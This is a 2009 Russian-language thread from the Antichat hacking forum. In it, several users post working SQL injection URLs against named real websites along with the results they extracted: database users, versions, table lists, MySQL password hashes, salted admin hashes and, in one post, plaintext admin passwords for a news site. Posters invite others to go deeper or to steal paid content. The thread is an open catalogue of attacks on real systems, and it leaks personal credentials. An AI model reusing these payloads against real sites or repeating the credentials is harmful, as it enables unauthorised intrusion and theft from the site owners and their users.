HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.05.2009, 18:36
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

PR6 Tic 425
http://helikon.ru/tree/index.php?id=-1'+union+select+1,2,3,table_name,5,6,7,8,9,10+from +information_schema.tables+limit+30,100+/*+
 
Ответить с цитированием

  #2  
Старый 29.05.2009, 21:10
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

http://www.moscow-tram-collection.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+/*+

http://www.emhk.org/course/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 +/*+
 
Ответить с цитированием

  #3  
Старый 29.05.2009, 23:58
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Цитата:
http://www.kontour.ru/tour.php?t=-622+UNION+SELECT+1,2,3,4,5,6,7,conc at_ws(0x0b,user(),version(),data base()),9
kontour1_vask@v19.valuehost.ru
4.0.27-max-log
kontour1_vask


Цитата:
http://www.12821-80.ru/board/index.php?id=1407+UNION+SELECT+0,1,2,3,4,5,6,7,con cat_ws(0x0b,user(),ver sion(),data base()),9,10,11+LIMIT+1,1
u89844@10.10.223.248
5.0.67-log
u89844


Цитата:
http://www.novanews.lv/index.php?mode=news&id=-73584'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_ws( 0x0b,user(),vers ion(),datab ase()),11,12,13,14+--+
novonews_v2_adm@192.168.1.1
5.0.22-log
novonews_v2

http://www.novanews.lv/admin/

Цитата:
bars:verbatimTVS2006#
deftones:2995SenotFed12nOvo
dimaimA5647382910NOvo2698
igor:Ig098fsdk234789237klfs
img:26027iMg-ImG68nOVo
mila:707aLiMduL2941nOVo
novak:1966eMmA260783nOvo
novonews:10306sWenOvonW7071
oksana:s2104OksanaVotpuskE
palich:590hCiLAp818nOvO




Цитата:
http://www.studs.ru/gostbyoks.php?id=-01.075+UNION+SELECT+0,1,2,3,concat_ws(0x0b,user(), d atabase(),version()),5,6
dbu_raus_1@localhost
db_raus_3
4.1.22
Цитата:
*443DE684FD4F7F0F170E06E46E0F12CFE6FB01E6:root
*973697BEAB2A6241C5BDA14161AFDD895596F272:dbusnip
*4ED45ADE51BF087894A26AB17C4DD37D3DA4E091:dbu_raus _1
*443DE684FD4F7F0F170E06E46E0F12CFE6FB01E6:daraus
*0DF30793CA315A510809933DD575E5DBBC20F94F:dbubooks
*F9F54FAE469D78C350AC6893AAEBC374E4A54A31:dbu_dara u3_1
*930FE66D5BB09B02C4F6B57F88B781C2839256E6:usr_sova
*F0C21FFEF4A7CF11C1CE8A260A502232B2AEEB05:dbuspbti
*7AF7ACF173E7211B288E623164BDC15141A2C7A2:linki
*649B5F597603CB2B4F7C9F9FCC036586A100AC65:linki
*4515D77146368853A388F57E9F33B1912569ECA5:dimax
*682A41CABF61F63590A5E3931FCDB30B30A5A1D4:dimaxx
*004E2B691970E5DB505607B8F99199698FA6FB40:context
D34FAF52493CEE36E6B69A5FBA1B7C8E0AA3785A:linkadm
*CA9CB371E219D678D059829EE2022A35E74F2EF0:dbu_joom la15
*CA9CB371E219D678D059829EE2022A35E74F2EF0:admin
*CA9CB371E219D678D059829EE2022A35E74F2EF0:aleshka_ phpbb
*BF7284FE452995C18887F9048F5223F93A435E74:exim
*0E9EB90C98B1ACD828954025494A6D75AF4F67C3:roundcub e
*7409067142AD4948AFDAB8936DE1ACDABDA14794:abrys
*9761D68301CA7238E01E3924C1F5E3DB3310BC05:sekos
*B2C0539CF497702C2231AA54E324F05B551FF637:woff
*57D54BE4686603FB2250CD30AA9E4B608C842858:uglobalf o
*C449BD9E1FB541A6DF198AD35F1485F4538FE9FE:itski
*CA9CB371E219D678D059829EE2022A35E74F2EF0:vkinvite r
*9876E2C9C007C0D9BCE81BE8C3FDA9D0568D6986:uhrenogo st
*CA9CB371E219D678D059829EE2022A35E74F2EF0:wiki_use r
*2C67D8A552E87D54AEBBA49F0974E07BD77299AB:techu
*E92D4A3359D02EF0860C12815596CD6C3F0D79DE:livepcc




Цитата:
http://infoworks.com.ua/newsinfo.php?newsID=-14+UNION+SELECT+1,concat_ws(0x0b,user(),ver sion(),database()),3--
u_infoworks@localhost
4.1.22
infoworks





Цитата:
http://www.clipart.net.ua/catalog.php?sub=63+UNION+SELECT+1,2,concat_ws(0x2b ,user(),v ersion(),databa se()),4,5+LIMIT+1,1
5.0.67-userstats-log
clipartua
clipartdb@lepke.dreamhost.com


если у кого получится стащить платные дипломки отпишитесь в ЛС

Последний раз редактировалось udman; 30.05.2009 в 00:02..
 
Ответить с цитированием

  #4  
Старый 30.05.2009, 10:29
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.drcar-murko.si/arhiv.php?tip=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6,7,8,9/*

4.0.20:drcar-murko@localhost:drcar-murko
 
Ответить с цитированием

  #5  
Старый 30.05.2009, 12:10
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

какая то team CS

http://www.fragz-united.de/index.php?site=profile&id=1'+and+substring(version (),1,1)=5+--+


#####################################
PR4

http://www.kitaitour.ru/info.php?id=749'+union+select+1,2,concat_ws(0x3a,u ser(),database(),version())+--+

root@localhost:_sites:5.0.26

куча табл

http://www.kitaitour.ru/info.php?id=749'+union+select+1,2,table_name+from+ information_schema.tables+--+

http://www.kitaitour.ru/info.php?id=749'+union+select+1,2,concat_ws(0x3a,u ser,password,file_priv)+from+mysql.user+--+

root:*8890FECAB5F65D32D9AC16A6D76E1B15F372465A:Y
::N
pma:*6C8DC88838BA26F23FC09ED48861E966C911B4CB:N pma

http://www.kitaitour.ru/info.php?id=749'+union+select+1,2,concat_ws(0x3a,' p')+from+mysql.user+--+

p

magic quotes = off

Последний раз редактировалось HAXTA4OK; 30.05.2009 в 12:59..
 
Ответить с цитированием

tests.specialist.ru
  #6  
Старый 30.05.2009, 15:32
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию tests.specialist.ru

Online тестирование и сертификация "SPECIALIST"

Version:
http://tests.specialist.ru/complete.asp?Test=10+or+1=@@version--
Цитата:
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
db_name:
http://tests.specialist.ru/complete.asp?Test=10+or+1=(select+db_name())--
Цитата:
Tests
User:
http://tests.specialist.ru/complete.asp?Test=10+or+1=(select+system_user)--
Цитата:
IUser
Подбор табличек:
http://tests.specialist.ru/complete.asp?Test=1+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES)--
http://tests.specialist.ru/complete.asp?Test=1+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES+where+table_name+NO T+IN+('UnitResult'))--
Цитата:
UnitResult
TestForTG
и т. д.
 
Ответить с цитированием

  #7  
Старый 30.05.2009, 17:11
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.utg.net.ua/article.php?article_id=8+and+substring(version(),1 ,1)=3

http://www.sttsnn.ru/arhiv.php?menu=1&month=4&year=2007+and+substring(v ersion(),1,1)=4

http://www.permoboz.ru/txt.php?n=6705+and+substring(version(),1,1)=4/*
 
Ответить с цитированием

  #8  
Старый 30.05.2009, 17:33
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

http://www.aiondb.ru./index.php?show_file&id=-1+UnIoN+SeLeCT+1,2,3,4,5,6,concat_ws(0x3a3a,id,abo ut,contact,pw,log,email,phone,copyr,diz,top_zagl,t itle_main,desc_main,title_about,desc_about,title_c ontact,desc_contact,keywords,center_footer,logo_fi le,phone_file,title_clients,desc_clients,title_ord er,desc_order,main_page_text,about_page_text,conta cts_page_text,counter_block),8,9+from+aion_config+--+
1::rhfgbdhfg79::aionadmin::admin@aiondb.ru (З.Ы. То ли пас с логином то ли трэшь?!)
http://www.aiondb.ru/library/vbuser.sql

Хешь админа 86defe53d9974067e9a98f5b7b53eae4 подсолен z$S

Таблы которые открыты:
aion_catalog_razd
aion_razd
aion_config
aion_video
aion_file
aion_video_razd
aion_file_razd
aion_podrazd
Есть удал раб стол дефолтные пассы неподходят
Если кто прокопает дальше - плиз пишите в ПМ))
Совместно с HAXTA4OK'ом ))
 
Ответить с цитированием

  #9  
Старый 30.05.2009, 17:58
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


По умолчанию

Цитата:
http://www.wifilab.ru/catalogue/tovar.php?id=-1232+union+select+1,2,3,4+
users:
ppkvm - 48a5da7d886197c858585e4f1ee52033
maks - 5adcf11410991e502e9fc96ec5a6100a

хеши рассшифровать не удалось.

Version() 5.0.22-log
Database() wifilab_datab
User() wifilab_userd@localhost

GOOGLE PR - 3
YANDEX TIC - 30
 
Ответить с цитированием

  #10  
Старый 31.05.2009, 00:09
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.bride-style.ru/arhiv.php?s=-15+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4
4.1.22-log:bridesth_bridest@localhost:bridesth_bridesth
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.